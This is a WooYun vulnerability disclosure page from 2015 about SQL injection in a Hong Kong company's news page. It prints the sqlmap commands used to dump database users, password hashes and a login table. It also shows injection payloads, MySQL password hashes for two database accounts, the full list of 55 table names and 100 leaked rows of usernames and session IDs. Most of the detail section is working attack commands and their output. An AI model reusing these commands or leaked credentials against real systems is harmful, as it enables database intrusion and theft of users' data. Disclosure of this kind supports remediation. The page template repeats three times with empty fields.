海港錦鯉集團某處存在SQL插入漏洞（rdsadmin密碼泄露/55個表/22萬用戶ip地址及sessionid泄露）（香港地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0151431

漏洞标题：海港錦鯉集團某處存在SQL插入漏洞（rdsadmin密碼泄露/55個表/22萬用戶ip地址及sessionid泄露）（香港地區）

漏洞作者：路人甲

提交时间：2015-11-03 09:54

修复时间：2015-12-19 17:48

公开时间：2015-12-19 17:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-03：细节已通知厂商并且等待厂商处理中
2015-11-04：厂商已经确认，细节仅向厂商公开
2015-11-14：细节向核心白帽子及相关领域专家公开
2015-11-24：细节向普通白帽子公开
2015-12-04：细节向实习白帽子公开
2015-12-19：细节向公众公开

简要描述：

海港錦鯉集團某處存在SQL插入漏洞（rdsadmin密碼泄露/55個表/22萬用戶ip地址及sessionid泄露）

详细说明：

地址：http://**.**.**.**/news_details.php?news_id=121

python sqlmap.py -u "http://**.**.**.**/news_details.php?news_id=121" -p news_id --technique=BTU --random-agent --batch --users --passwords

python sqlmap.py -u "http://**.**.**.**/news_details.php?news_id=121" -p news_id --technique=BTU --random-agent --batch -D koi_db -T user_login -C ipaddress,logintime,username,usession_id --start 1 --stop 100 --dump

back-end DBMS: MySQL 5.0.12
Database: koi_db
+------------+---------+
| Table      | Entries |
+------------+---------+
| user_login | 225089  |
+------------+---------+

漏洞证明：

---
Parameter: news_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: news_id=121 AND 8135=8135
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: news_id=121 AND (SELECT * FROM (SELECT(SLEEP(5)))HFsw)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: news_id=-4801 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a7a6b71,0x594b7562794f75535954476745476e645a426950726276454c417869484e666470536a56436b5848,0x71786b6271),NULL,NULL-- -
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: PHP 5.3.10, Apache 2.2.22
back-end DBMS: MySQL 5.0.12
database management system users [2]:
[*] 'koidbuser'@'%'
[*] 'rdsadmin'@'localhost'
database management system users password hashes:
[*] koidbuser [1]:
    password hash: *B4424A0597FD6459C51B530FDC8831BF925CEFAF
[*] rdsadmin [1]:
    password hash: *3F809E3C7A7660DFADEC1A097315F38B7F26576E

---
Parameter: news_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: news_id=121 AND 8135=8135
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: news_id=121 AND (SELECT * FROM (SELECT(SLEEP(5)))HFsw)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: news_id=-4801 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a7a6b71,0x594b7562794f75535954476745476e645a426950726276454c417869484e666470536a56436b5848,0x71786b6271),NULL,NULL-- -
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: PHP 5.3.10, Apache 2.2.22
back-end DBMS: MySQL 5.0.12
available databases [8]:
[*] information_schema
[*] innodb
[*] koi_db
[*] koishop
[*] mysql
[*] pennydb
[*] performance_schema
[*] tmp
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: news_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: news_id=121 AND 8135=8135
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: news_id=121 AND (SELECT * FROM (SELECT(SLEEP(5)))HFsw)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: news_id=-4801 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a7a6b71,0x594b7562794f75535954476745476e645a426950726276454c417869484e666470536a56436b5848,0x71786b6271),NULL,NULL-- -
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: PHP 5.3.10, Apache 2.2.22
back-end DBMS: MySQL 5.0.12
Database: koi_db
[55 tables]
+---------------------------+
| activation                |
| address_name              |
| address_province          |
| adv                       |
| alipay                    |
| anwser                    |
| banner                    |
| banner_old                |
| banner_tmp                |
| banner_tmp_old            |
| bid                       |
| bid_action                |
| bid_image                 |
| bid_temp                  |
| bid_title                 |
| bid_title_old             |
| calendar                  |
| category                  |
| diary                     |
| edm_campaign              |
| game                      |
| game_content              |
| game_score                |
| game_score_content        |
| gift                      |
| gift_action               |
| internal_photo            |
| internal_photo_content    |
| knowledge                 |
| location                  |
| mem_temp                  |
| member                    |
| news                      |
| paypal_bid                |
| paypal_cart_info          |
| paypal_payment_info       |
| point_history             |
| product                   |
| product_image             |
| question                  |
| salesorder                |
| salesorder_items          |
| sc_main                   |
| sc_users                  |
| sms_verify                |
| staff                     |
| table_forum               |
| table_log                 |
| user_login                |
| votevideo                 |
| votevideo_title           |
| votevideo_type            |
| votevideoact              |
| votevideoact_bak_20131129 |
| votevideoact_bak_20141229 |
+---------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: news_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: news_id=121 AND 8135=8135
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: news_id=121 AND (SELECT * FROM (SELECT(SLEEP(5)))HFsw)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: news_id=-4801 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a7a6b71,0x594b7562794f75535954476745476e645a426950726276454c417869484e666470536a56436b5848,0x71786b6271),NULL,NULL-- -
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: PHP 5.3.10, Apache 2.2.22
back-end DBMS: MySQL 5.0.12
Database: koi_db
Table: user_login
[4 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| ipaddress   | varchar(50)  |
| logintime   | datetime     |
| username    | varchar(255) |
| usession_id | varchar(100) |
+-------------+--------------+

back-end DBMS: MySQL 5.0.12
Database: koi_db
+------------+---------+
| Table      | Entries |
+------------+---------+
| user_login | 225089  |
+------------+---------+

选择前100用户进行dump。

Database: koi_db
Table: user_login
[100 entries]
+-----------------+---------------------+------------+----------------------------------+
| ipaddress       | logintime           | username   | usession_id                      |
+-----------------+---------------------+------------+----------------------------------+
| **.**.**.** | 2011-05-26 15:27:45 | 0000000145 | 928f166c8528c448546567c08ac2673e |
| **.**.**.** | 2011-05-26 15:52:23 | 0000000001 | 928f166c8528c448546567c08ac2673e |
| **.**.**.** | 2011-05-26 15:57:33 | 0000000001 | 928f166c8528c448546567c08ac2673e |
| **.**.**.** | 2011-05-26 15:58:09 | 0000000145 | 928f166c8528c448546567c08ac2673e |
| **.**.**.** | 2011-05-26 16:03:39 | 0000000001 | 928f166c8528c448546567c08ac2673e |
| **.**.**.** | 2011-05-26 17:16:30 | 0000000147 | ac36efe8611ee33e9bb148cd7d84e7eb |
| **.**.**.** | 2011-05-26 17:17:03 | 0000000001 | 928f166c8528c448546567c08ac2673e |
| **.**.**.** | 2011-05-26 17:17:23 | 0000000145 | 928f166c8528c448546567c08ac2673e |
| **.**.**.**  | 2011-05-26 17:56:54 | 0000000001 | 89c1c77fbab136b959c4dbde7a585bcf |
| **.**.**.**  | 2011-05-26 21:28:45 | 0000000148 | 8a28bd69474b22b245ff729109b214e7 |
| **.**.**.**   | 2011-05-27 01:50:56 | 0000000148 | 0ff481ef67805c5151e6b32e5f16b917 |
| **.**.**.**   | 2011-05-27 02:29:35 | 0000000148 | 9c46d115d987cda89d549ec60882009b |
| **.**.**.**  | 2011-05-27 10:17:47 | 0000000001 | d35b69d0483d9e0ebbb44eb9ec6ff506 |
| **.**.**.**  | 2011-05-27 10:18:36 | 0000000001 | d35b69d0483d9e0ebbb44eb9ec6ff506 |
| **.**.**.** | 2011-05-27 11:05:56 | 0000000003 | 57c527d85dabd83b193f9b912dc5f6a9 |
| **.**.**.**  | 2011-05-27 12:49:52 | 0000000001 | d35b69d0483d9e0ebbb44eb9ec6ff506 |
| **.**.**.**  | 2011-05-27 12:57:24 | 0000000001 | d35b69d0483d9e0ebbb44eb9ec6ff506 |
| **.**.**.**  | 2011-05-27 14:15:56 | 0000000001 | 27df9180bb34cc6bda9e15f4a89d7bd6 |
| **.**.**.**  | 2011-05-27 14:16:23 | 0000000001 | 27df9180bb34cc6bda9e15f4a89d7bd6 |
| **.**.**.**  | 2011-05-27 14:19:52 | 0000000001 | 27df9180bb34cc6bda9e15f4a89d7bd6 |
| **.**.**.**  | 2011-05-27 14:46:59 | 0000000145 | 27df9180bb34cc6bda9e15f4a89d7bd6 |
| **.**.**.**  | 2011-05-27 14:57:13 | 0000000001 | 27df9180bb34cc6bda9e15f4a89d7bd6 |
| **.**.**.**   | 2011-05-27 15:36:32 | 0000000149 | c5096165fe92c0381b3e9c4d0133adc6 |
| **.**.**.**   | 2011-05-27 21:39:52 | 0000000148 | 34a297109a9211ee415f32d7f2f6bbaa |
| **.**.**.** | 2011-05-27 21:44:29 | 0000000001 | 1fef9faa5f92e2b14a54e9edac5aed50 |
| **.**.**.**   | 2011-05-27 22:35:25 | 0000000150 | 34a297109a9211ee415f32d7f2f6bbaa |
| **.**.**.**   | 2011-05-27 23:17:46 | 0000000150 | 097b13d35a9631392f20573871024612 |
| **.**.**.**  | 2011-05-28 11:34:57 | 0000000001 | 995fe683ceaf1d529371ac7a80b6be7e |
| **.**.**.**    | 2011-05-28 11:55:16 | 0000000003 | fe7e5ca6df5cf8d40f530d12d7b416e5 |
| **.**.**.**  | 2011-05-28 14:21:37 | 0000000001 | 995fe683ceaf1d529371ac7a80b6be7e |
| **.**.**.**  | 2011-05-28 15:22:23 | 0000000001 | 485be880cf0fbf197a7e578504f440eb |
| **.**.**.**  | 2011-05-28 16:13:35 | 0000000149 | 76dba8afbb1bcad14182435f861954d7 |
| **.**.**.**  | 2011-05-28 16:18:11 | 0000000001 | 485be880cf0fbf197a7e578504f440eb |
| **.**.**.**   | 2011-05-28 17:05:24 | 0000000149 | e2cee6db6a51cd0db687ee81c13b9fab |
| **.**.**.** | 2011-05-28 19:44:57 | 0000000001 | 8e0d07ddbd987f364267fa3f60941104 |
| **.**.**.**  | 2011-05-29 01:02:32 | 0000000148 | bd8a1ab12afe4493b24f2e1bce687eb7 |
| **.**.**.**     | 2011-05-29 03:33:01 | 0002011388 | 85ccc10034ce914675ceb40730b83590 |
| **.**.**.**   | 2011-05-29 03:40:47 | 0002011389 | 251d2432251495fc805ad48f5e0377a5 |
| **.**.**.**   | 2011-05-29 04:31:40 | 0000000118 | dbceba0f88fdef0519da83183d611168 |
| **.**.**.** | 2011-05-29 08:22:54 | 0002011392 | 87056716bb2fa15906a2e6935fea5064 |
| **.**.**.** | 2011-05-29 08:27:18 | 0002011391 | 97bd47f05e8082493133125cfc1277dd |
| **.**.**.** | 2011-05-29 08:37:38 | 0002011392 | be0b2d66e3b159652c907ee771964dfa |
| **.**.**.**  | 2011-05-29 08:50:14 | 0002011395 | c6587be636f07bf9dd612bf73105d1cf |
| **.**.**.**   | 2011-05-29 08:52:39 | 0002011390 | 8ec14a16eb2ad99966d4c734eb3bc339 |
| **.**.**.**   | 2011-05-29 08:54:10 | 0002011394 | 0b88247396299ac41c949fe869471e80 |
| **.**.**.**   | 2011-05-29 09:02:29 | 0002011390 | 8ec14a16eb2ad99966d4c734eb3bc339 |
| **.**.**.**   | 2011-05-29 09:09:31 | 0000000049 | 1913c1fbd6daeb24e7c1d0404ddd6868 |
| **.**.**.** | 2011-05-29 09:19:02 | 0002011396 | b29801fbe58861ecbc8aa5ebecac34f3 |
| **.**.**.**    | 2011-05-29 10:00:54 | 0002011397 | 742656c4b38116acab89706bc0d0b41c |
| **.**.**.**    | 2011-05-29 11:26:13 | 0002011399 | 13bbc152ad02da4e1392d3af5a53bd1e |
| **.**.**.**    | 2011-05-29 11:29:04 | 0002011399 | 13bbc152ad02da4e1392d3af5a53bd1e |
| **.**.**.**  | 2011-05-29 11:38:52 | 0002011400 | 18213edae4eb2a30a4d2ca41c5eaba0a |
| **.**.**.**  | 2011-05-29 11:40:15 | 0002011400 | a7a4d57ae06cbc8f04cde82ca8fb16f8 |
| **.**.**.** | 2011-05-29 11:48:33 | 0000000001 | 4152802c44f3bd2aa6d7c25db8619704 |
| **.**.**.**  | 2011-05-29 12:08:23 | 0002011402 | 7a01f5e797e425e54805a268e1ac7eb8 |
| **.**.**.**     | 2011-05-29 13:06:52 | 0002011404 | c5e3dddf1381b1b51604b7e39de310bc |
| **.**.**.** | 2011-05-29 14:36:37 | 0002011406 | 8f222136d871ff978270225cf48864dc |
| **.**.**.**  | 2011-05-29 14:42:24 | 0002011407 | 7672afa01fde6b235f8284dec3c58486 |
| **.**.**.**  | 2011-05-29 14:43:54 | 0002011407 | 7672afa01fde6b235f8284dec3c58486 |
| **.**.**.**    | 2011-05-29 15:00:15 | 0002011408 | f34771b11d804688fd9c8690affc2391 |
| **.**.**.**  | 2011-05-29 15:05:33 | 0002011409 | 09d4c896015247c7978b7df988c7c325 |
| **.**.**.** | 2011-05-29 15:05:59 | 0002011406 | 8f222136d871ff978270225cf48864dc |
| **.**.**.**  | 2011-05-29 16:13:21 | 0002011410 | cec2d503840ad310981a307eb7354a59 |
| **.**.**.** | 2011-05-29 17:12:16 | 0000000090 | b2f694e679a964b81ccb2afa9d57e3bf |
| **.**.**.**    | 2011-05-29 17:28:34 | 0002011411 | 0d61ae4a8e5ced00a6050e383d62d172 |
| **.**.**.**   | 2011-05-29 17:40:42 | 0002011412 | 77f437d29f9b142d66755ae67ad0dcc0 |
| **.**.**.**   | 2011-05-29 19:37:29 | 0002011413 | 893b7aaf2a5478c4a846c36c400d888a |
| **.**.**.**  | 2011-05-29 19:46:00 | 0002011414 | 01c530a30b40fadee07b85e72f5a525e |
| **.**.**.**   | 2011-05-29 20:05:22 | 0002011415 | 4c575e5b1fa68a3c8dfb8a19a794d798 |
| **.**.**.** | 2011-05-29 20:37:25 | 0002011416 | 931cd6e6fe70d4f302f8c5a5644949e8 |
| **.**.**.**   | 2011-05-29 21:47:50 | 0002011403 | 4c85676dd14d020d32630316e93b6936 |
| **.**.**.**   | 2011-05-29 22:04:37 | 0002011418 | 27e1d5e6ea3e6ec875e83baab2dc4479 |
| **.**.**.**  | 2011-05-29 22:37:21 | 0002011407 | 7672afa01fde6b235f8284dec3c58486 |
| **.**.**.**   | 2011-05-29 23:18:43 | 0002011419 | dbbbb00baa9838a7bb9a4d7708ca6d9c |
| **.**.**.**  | 2011-05-29 23:30:17 | 0002011389 | 63b1de03c41d277c2acd3c77b0bdd9ce |
| **.**.**.**    | 2011-05-30 00:37:58 | 0002011420 | 90323dcfa479beddecdf721b33b325f4 |
| **.**.**.**   | 2011-05-30 09:27:29 | 0002011421 | a99bd9f2489f4301c282b1c72a240b1c |
| **.**.**.**   | 2011-05-30 12:25:30 | 0002011423 | a40a8ea720459e22d442691e528a0ead |
| **.**.**.**  | 2011-05-30 14:43:34 | 0002011424 | 2ccecce5877f60484438dd27bdaf61b9 |
| **.**.**.** | 2011-05-30 15:26:16 | 0002011425 | a7d42efd7e4b7d722ce1a9053d244deb |
| **.**.**.**    | 2011-05-30 15:45:52 | 0002011426 | eb899018c9630654a115ecd937b892ad |
| **.**.**.**  | 2011-05-30 16:27:15 | 0002011405 | 43721c187f7a2122fac7e4aa04e0268f |
| **.**.**.**    | 2011-05-30 17:36:30 | 0002011427 | 98159ae1726c061ea216f2833ab240b4 |
| **.**.**.**  | 2011-05-30 17:38:54 | 0002011407 | 7672afa01fde6b235f8284dec3c58486 |
| **.**.**.**   | 2011-05-30 19:39:28 | 0000000148 | 57c2f3151ece14f7460fe02a353de80d |
| **.**.**.**  | 2011-05-30 20:08:34 | 0002011428 | bdfc3146ce9ccbd59d1bb6bb358bb3c3 |
| **.**.**.**    | 2011-05-30 20:56:55 | 0002011429 | f43c69d38929faabc82278ec77304dc1 |
| **.**.**.** | 2011-05-30 21:45:17 | 0000000024 | 5a3ef1757cbe0c1e0d4d761421275f58 |
| **.**.**.**    | 2011-05-30 22:13:04 | 0002011430 | fbb343167cb87ba83d7749abc4239358 |
| **.**.**.**  | 2011-05-30 22:20:58 | 0000000058 | 05823858ac97de7b02acb73eaa2e389d |
| **.**.**.**   | 2011-05-30 22:51:17 | 0002011432 | f476f75fd5a98a00700e1e12695a72de |
| **.**.**.** | 2011-05-30 23:34:01 | 0002011434 | e5150245bfcab102f7de27bc44285be9 |
| **.**.**.**  | 2011-05-30 23:36:58 | 0002011433 | 5a958fbedea352cc7bef48523db65016 |
| **.**.**.**   | 2011-05-30 23:49:14 | 0000000148 | 57c2f3151ece14f7460fe02a353de80d |
| **.**.**.**    | 2011-05-31 03:13:32 | 0002011435 | 1020f525106b0b2e48dde10c06a207f7 |
| **.**.**.**  | 2011-05-31 09:27:05 | 0002011437 | ec0319ae11e39b16f9e62a3dfdd34bf2 |
| **.**.**.**  | 2011-05-31 09:45:47 | 0002011437 | d06c20303124afce9a1c1aea104b40ae |
| **.**.**.**    | 2011-05-31 09:46:06 | 0002011426 | f8694a04cf5c2c28ed28e53ec4ce1e55 |
| **.**.**.**   | 2011-05-31 09:47:43 | 0000000148 | 57c2f3151ece14f7460fe02a353de80d |
| **.**.**.**    | 2011-05-31 10:59:43 | 0002011411 | acbe4a0fdb18263f08bf13380be8f6ee |
+-----------------+---------------------+------------+----------------------------------+

修复方案：

上WAF。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2015-11-04 17:47

厂商回复：

已將事件通知有關機構

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0151431

漏洞标题：海港錦鯉集團某處存在SQL插入漏洞（rdsadmin密碼泄露/55個表/22萬用戶ip地址及sessionid泄露）（香港地區）

相关厂商：海港錦鯉集團

漏洞作者：路人甲

提交时间：2015-11-03 09:54

修复时间：2015-12-19 17:48

公开时间：2015-12-19 17:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0151431

漏洞标题：海港錦鯉集團某處存在SQL插入漏洞（rdsadmin密碼泄露/55個表/22萬用戶ip地址及sessionid泄露）（香港地區）

相关厂商：海港錦鯉集團

漏洞作者： 路人甲

提交时间：2015-11-03 09:54

修复时间：2015-12-19 17:48

公开时间：2015-12-19 17:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0151431"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云